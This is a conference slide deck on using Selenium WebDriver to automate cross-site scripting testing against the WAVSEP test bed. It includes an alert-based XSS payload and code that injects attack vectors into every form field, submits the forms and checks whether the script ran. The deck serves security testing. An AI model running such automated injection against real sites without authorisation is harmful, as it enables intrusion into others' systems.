Adrian Rapan, LMAX

Re-purposing Webdriver

for

Security Testing

www.eurostarconferences.com

@esconfs #esconfs

I work for…

About

• Tester/Speaker

• LinkedIn/Twitter: adyon2004

• Email: adrian.rapan@lmax.com

The drive

• Research

– Security testing

– Webdriver

– Transparency

– Groovy

Demo

• Video

Security testing

• Open Web Application Security Project (OWASP)

• MITM (man-in-the-middle) attack

• DoS attack

• Metasploit

• BackTrack (Linux distribution used in penetration testing)

• Acunetix, Netsparker, N-Stalker, ProxyStrike, XSSS

What about…

• Webdriver?

• It tests websites

• Drivers for different browser/OS pairs

• With a bit of tinkering can manipulate the DOM

How

• The test bed: Application Vulnerability Scanner Evaluation Project (WAVSEP)

– Reflected/Stored Cross-Site Scripting (XSS): 66 test cases, implemented in 64 jsp pages (GET & POST)

– 7 different categories of false positive Reflected XSS vulnerabilities (GET & POST )

– Payloads comprising of 44 attack vectors

Ingredients

• The attack vectors:

https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet and save it as an XML

• Javascript snippets like:

<INPUT TYPE="IMAGE" SRC="javascript:alert('CrossSiteScriptingAcademia12');"></script>

Transparency

• Commercial tools…how do they do it???

• The security scanners tell you about vulnerabilities

• They’ll even offer a solution

• But how do they do it???

What about…

• Webdriver?

• Drives the browser just like a tester would

• Total transparency over the value of running a test

• Any security tests run using a real browser

• Lower false-positive rate of detection

Test case

• The browser navigates to the required webpage

• Webdriver scans for input forms which represent the delivery channel for the XSS payloads

• The XSS attack vectors are inserted in the input fields of the form

• The form is submitted

• The attack efficiency is verified by detecting the execton of Javascript snippet

Under the hood

• Getting the urls from a website as an XML

– Few tools online. Used http://www.xml-sitemaps.com/crawlproc.html?&initurl=<<website>>

Under the hood

• Each url is opened by webdriver and scanned for FORMs

allForms = driver.findElements(By.xpath("//form"));

• All inputs from the FORM

allInputs = form.findElements(By.xpath(".//input"));

• Each input is populated by the attack vector

input.sendKeys(vector);

Under the hood

• Submit the injected FORM

form.findElement(By.xpath(".//input[@type='submit']")).click();

• Repeat for each FORM from each url

Under the hood

• The actual Webriver test for an url

webDriver.attack(urlToAttack).using(attackVector).run();

webDriver.executionReportFor(attackVector).waitFor();

Now for the tricky part

• Detecting if the attack succeeded

• There is, one way… but it’s similar to watching paint dry

The automated way

driver.switchTo().alert()

• But what if the alert is hidden in the DOM waiting for a triggering event, like a click

Another “dirty” automated way

• Use the infamous JavascriptExecutor

((JavascriptExecutor) driver).executeScript(payloadToExecute);

• It goes against the intended usage of Webdriver – to test as a tester would

And the method is

• Running an xpath to find the “hidden” payload and then executing it

((JavascriptExecutor) driver).executeScript("return (document.evaluate(\"//@*[contains(.,<<the attack vector>>')]\", document, null, XPathResult.STRING_TYPE, null)).stringValue")

Some conclusions

• Writing tests to cover security test cases isn’t that hard

• The attack vectors for XSS are publicly available

• Using Webdriver as a security tool might be slow but offers more transparency and

• Best of all, it’s free

Eind

• Thank you!